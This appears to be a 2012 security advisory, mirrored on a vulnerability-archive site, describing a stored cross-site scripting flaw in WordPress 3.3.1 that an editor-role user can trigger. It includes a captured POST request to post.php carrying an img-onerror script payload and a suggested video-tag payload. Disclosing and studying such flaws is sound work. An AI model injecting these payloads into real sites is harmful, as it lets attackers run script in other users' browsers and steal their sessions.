WordPress version 3.3.1 suffers from a post authentication persistent cross site scripting vulnerability.
ca5b0da960edfdc90f3bca91471fd1e8e140685e1c6f09af0664f6dc75e619bb# TITLE ....... # Wordpress 3.3.1 post-auth persistent XSS ............ #
# DATE ........ # 18.02.2012 .......................................... #
# AUTOHR ...... # http://hauntit.blogspot.com ......................... #
# SOFT LINK ... # http://wordpress.org ................................ #
# VERSION ..... # 1.0.0 ............................................... #
# TESTED ON ... # LAMP ................................................ #
# ..................................................................... #
# 1. What is this?
# 2. What is the type of vulnerability?
# 3. Where is bug :)
# 4. More...
#............................................#
# 1. What is this?
This is very nice CMS, You should try it! ;)
# 2. What is the type of vulnerability?
This is standard persistent XSS for normal (registered) user (with 'editor' role).
"An attacker may exploit the html-injection issue to execute arbitrary script code
in the browser of an unsuspecting user in the context of the saffected site. This
may allow to steal cookie-based authentication credentials, control how the site
is displayed, and launch other attacks."
# 3. Where is bug :)
...cut from Burp...
POST /www/Wordpress/wordpress/wp-admin/post.php HTTP/1.1
(...)
content=qqqqqqqqqqqqqqqqqqqqqq"%2f%3e%3cimg%20src%3dx%20onerror%3dalert(123)%3e%3c
...cut from Burp...
By setting up 'content' parameter to value contains JS payload we can trigger XSS (add it
for other users in WP).
Payload to use for storing XSS could be tag 'video':
<video onload=<xss>>
# 4. More...
- http://www.wordpress.org
- http://hauntit.blogspot.com
- http://www.google.com
- http://portswigger.net
# Best regards
#
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed